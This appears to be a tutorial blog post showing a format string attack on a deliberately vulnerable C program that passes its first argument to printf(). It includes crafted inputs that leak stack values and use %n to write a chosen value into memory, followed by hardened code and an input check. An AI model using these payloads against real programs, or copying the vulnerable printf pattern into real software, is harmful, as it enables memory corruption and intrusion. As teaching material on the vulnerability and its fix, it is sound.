2009-12-25 Linux Format String Attack 1
A format string attack targets C functions that take a format string. The best-known one is printf(), but other functions in the printf family accept format strings too. Here is C code that uses printf() badly:
#include <stdio.h>
#include <string.h>
#include <stdint.h>

int main( int argc, char **argv )
{
    static int i = 0;
    char text[1000];

    if (argc < 2)
        return 1;
    strncpy(text, argv[1], sizeof text - 1);        /* the first argument becomes the format string */
    text[sizeof text - 1] = '\0';
    printf("%.8lx\n", (unsigned long)(uintptr_t)&i); /* address of the static i */
    printf("No way it never will works because value of i=%d\n", i);
    printf( text );                                  /* the bug: user input used as the format string */
    printf("\nValue of i=%d\n", i);
    return 0;
}
The first output line is the address of the static variable i. Then the program prints the value of i, calls printf() with the program's first argument as the format string, and finally prints the value of i again so we can watch whether it changed.
Run:
./e1 'Halolo'
Output:
08049674
No way it never will works because value of i=0
Halolo
Value of i=0
Run:
./e1 'Halolo%s'
Output:
08049674
No way it never will works because value of i=0
Halolo(null)
Value of i=0
Run:
./e1 $'\x74\x96\x04\x08_%x'
Output:
08049674
No way it never will works because value of i=0
t?_0
Value of i=0
Now read about %n in the format string: it prints nothing, but stores the number of characters output so far into the int that its argument points to.
Run:
./e1 $'\x74\x96\x04\x08_%x_%n'
Output:
08049674
No way it never will works because value of i=0
Segmentation fault
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16
Run:
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
Output:
08049674
No way it never will works because value of i=0
t?_0_8_40_4_0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004_
Value of i=1216
Now you can write almost any value into i: %n stores the number of characters printed so far, so the precision of the preceding %x (1201 here) controls the value.
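As an added example (not the post's program), here is the hardened form of the same printf() call beside a check for conversion characters in untrusted text, and a function that reproduces the post's counts of 16 and 1216 from a constant format. The names log_safe, contains_conversion and chars_before_n are mine; the stack values 0, 8, 0x40 and 4 are the ones seen in the outputs above but are supplied here as ordinary arguments, and "AAAA" stands in for the four address bytes at the start of the post's input:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the post's own program. The stack values 0, 8, 0x40 and 4
   are the ones seen in the post's %x output, but here they are passed as
   explicit arguments to a constant format so nothing is read off the stack. */

/* The hardened form of the post's printf(text): the format is a literal and
   the untrusted text is only a %s argument, so %x and %n inside it are inert. */
void log_safe(const char *text)
{
    /* the post's version was:  printf(text);  */
    printf("%s\n", text);
}

/* Input check for code that cannot be changed right away: returns 1 when the
   text holds a '%' that a format function would treat as a conversion.
   "%%" is a literal percent sign and is not counted. */
int contains_conversion(const char *text)
{
    for (const char *p = text; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        return 1;               /* '%' followed by anything else, or at end of text */
    }
    return 0;
}

/* What %n stores: the number of characters written before it. The format is a
   literal, the precision of the fifth %x is passed with '*', and "AAAA" stands
   in for the 4 address bytes the post places at the start of its input. */
int chars_before_n(int precision)
{
    char buf[4096];
    int written = -1;

    if (precision < 0 || precision > 4000)
        return -1;              /* keep the output inside buf */
    snprintf(buf, sizeof buf, "AAAA_%x_%x_%x_%x_%.*x_%n",
             0u, 8u, 0x40u, 4u, precision, 4u, &written);
    return written;             /* 4 + 10 + precision + 1 */
}

int main(void)
{
    log_safe("Halolo%s");                                          /* printed verbatim, no (null) */
    printf("contains_conversion(\"_%%x_%%n\") = %d\n", contains_conversion("_%x_%n"));
    printf("%%n after %%.1x    = %d\n", chars_before_n(1));        /* 16, as in the post */
    printf("%%n after %%.1201x = %d\n", chars_before_n(1201));     /* 1216, as in the post */
    return 0;
}
```

The counting function is the whole point of the %.1201x trick: "AAAA_" plus "0_8_40_4_" is 14 characters, the fifth conversion adds exactly its precision, and the trailing "_" adds one more, which is why precision 1 gives 16 and precision 1201 gives 1216. Once the format is a literal, as in log_safe, the same characters in the input are just text.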